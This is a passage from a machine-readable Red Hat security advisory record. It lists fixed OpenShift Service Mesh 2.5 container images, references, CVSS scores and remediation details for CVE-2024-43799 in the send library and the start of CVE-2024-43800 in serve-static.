{ category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", 